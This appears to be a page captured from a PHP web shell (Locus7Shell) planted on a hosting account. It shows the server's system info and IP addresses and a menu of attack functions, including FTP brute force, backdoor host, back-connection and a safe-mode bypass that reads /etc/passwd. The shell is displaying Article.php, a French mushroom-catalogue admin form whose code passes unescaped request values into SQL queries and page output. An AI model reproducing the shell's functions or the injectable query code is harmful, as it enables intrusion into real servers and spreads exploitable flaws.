Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/   drwx---r-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     Article.php (6.06 KB)      -rw----r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$date date("Y-m-d");
if (isset($_SESSION['identifiant']))
 {
  $user $_SESSION['identifiant'];

   if ($user)
    {
       if (isset($_GET['choix']))
        {
        $choix $_GET['choix'];

        if (isset($_GET['modif']))
            {
            //Obtention des données
           $genre $_POST['GENRE'];
          $espece $_POST['ESPECE'];
         $variete $_POST['VARIETE'];
     $subdivision $_POST['SUBDIVISION'];
            $pdf1 $_POST['PDF1'];
            $pdf2 $_POST['PDF2'];
            $pdf3 $_POST['PDF3'];
            $pdf4 $_POST['PDF4'];
               $pdf5 $_POST['PDF5'];
            $pdf6 $_POST['PDF6'];    
            $date date("Y-m-d");
            
        // Mise à jour des donnée
        mysql_query("UPDATE champignons SET GENRE='$genre' , ESPECE='$espece' , VARIETE='$variete', SUBDIVISION='$subdivision'");

     echo "<br> Données Mise à Jour pour la variété ".$variete.".";
            }
            else
            {
?>
          <form action='index.php?page=Article&choix=<?php echo $choix?>&modif=1' method='POST' enctype='multipart/form-data'>
          <br><span class='Style5'>
          <span class='Style6'><?php echo strtoupper("$choix"); ?></span><p>
           
           <table width='400' border='0' cellspacing='0' cellpadding='0'>
            <tr>
            <td>Variété :<br><img src="image/transparent.png" width="140" height="1" /></td>
            <td><input type="text" name="VARIETE" size="40" value='<?php if (isset($choix)) echo $choix?>'><br>
                <img src="image/transparent.png" width="30" height="4" /></td>
            </tr>
             <tr>
            <td>Marque: </td>
            <td><input type="text" name="GENRE" size="40" value='<?php if (isset($marque)) echo $marque?>'><br>
                <img src="image/transparent.png" width="30" height="4" /></td>
            </tr>
           <tr>
            <td>Catégorie </td>
            <td>
            <?php
            $get mysql_query("SELECT * FROM champignons WHERE VARIETE='$choix'");
           $row mysql_fetch_assoc($get);
         $genre $row['GENRE'];
        $espece $row['ESPECE'];
       $variete $row['VARIETE'];
   $subdivision $row['SUBDIVISION'];
          $pdf1 $row['PDF1'];
           $pdf2 $row['PDF2'];
          $pdf3 $row['PDF3'];
          $pdf4 $row['PDF4'];
          $pdf5 $row['PDF5'];
          $pdf6 $row['PDF6'];
        $number 0;
       $numbers 0;

            ?>
                    <select name='Categorie'>
                   <option value='<?php echo $cat?>'><?php echo $cat?></option>";
            <?php
              $obtenir mysql_query('SELECT * FROM champignons');
              while ($row mysql_fetch_assoc($obtenir))
                   {
                    $cat $row['SOUSCATEGORIE'];
                    $idcat $row['ID'];
                    echo "<option value=".$idcat.">".$cat."</option>";
                    }     
             ?>  
                    </select><br>
                   <select name='Categorie2'>
                   <option value=''></option>";
            <?php
              $obtenir mysql_query('SELECT * FROM articles_categorie ORDER BY SOUSCATEGORIE ASC ');
              while ($row mysql_fetch_assoc($obtenir))
                   {
                    $cat $row['SOUSCATEGORIE'];
                    $idcat $row['ID'];
                    echo "<option value=".$idcat.">".$cat."</option>";
                    }     
             ?>  
                    </select><br />
                    <select name='Categorie3'>
                   <option value=''></option>";
            <?php
              $obtenir mysql_query('SELECT * FROM articles_categorie ORDER BY SOUSCATEGORIE ASC ');
              while ($row mysql_fetch_assoc($obtenir))
                   {
                    $cat $row['SOUSCATEGORIE'];
                    $idcat $row['ID'];
                    echo "<option value=".$idcat.">".$cat."</option>";
                    }     
             ?>  
                    </select>
                <br><img src="image/transparent.png" width="30" height="4" /></td>
            <td rowspan="9" valign="top"><div align="right"><a href='index.php?page=Modification articles&choix=<?php echo $choix?>'><img src="<?php echo $picture?>" width="200" height="140" border="0" align="top" /></a><br />
            <img src="image/transparent.png" width="30" height="4" /><br />
              Référencé le: <?php echo $dateref?><br />
             Mise à jour le: <?php echo $datemodif?></div></td>
           </tr>
             <tr>
            <td>Prix de vente: </td>
            <td><input type="text" name="pdv" value='<?php if (isset($pdv)) echo $pdv?>'> /Unitaire<br>
                <img src="image/transparent.png" width="30" height="4" /></td>
            </tr>
               <tr>
            <td>Prix de location: </td>
            <td><input type="text" name="pdl" value='<?php if (isset($pdl)) echo $pdl?>'> /Jour<br>
                <img src="image/transparent.png" width="30" height="4" /></td>
            </tr>
            <tr>
            <td>Quantité: </td>
            <td><input type="text" name="quanti" value='<?php if (isset($quanti)) echo $quanti?>'><br>
                <img src="image/transparent.png" width="30" height="4" /></td>
            </tr>
            <tr>
            <td>Nbrs pour occasion: </td>
            <td><input type="text" name="quantivente" value='<?php if (isset($quantivente)) echo $quantivente?>'><br>
                <img src="image/transparent.png" width="30" height="4" /></td>
            </tr>
           <tr>
            <td>Description: </td>
            <td><textarea name="description" cols="40" rows="4"><?php if (isset($description)) echo $description?></textarea><br>
                <img src="image/transparent.png" width="30" height="4" /></td>
            </tr>
           <tr>
           <td></td>
           <td><input type="submit" name="crea" value="Modifier"></td>
           </tr>
           </table>
           </span>
          <p>
</form>
<?php
        
//              $query = mysql_query("INSERT INTO articles VALUES ('','$marque','$cat','$chap','$description','$date','$pdv','$quanti','$pdl','$quantivente','$location')");
              
              
          //formulaire de visionnage de l'article
           }
        }
        else
           echo("Vous devez choisir un article.");
   }
  else
    echo("Vous devez être connecté."); 
 }
else
    echo("Vous devez être connecté.");  
?>

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 
Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0066 ]--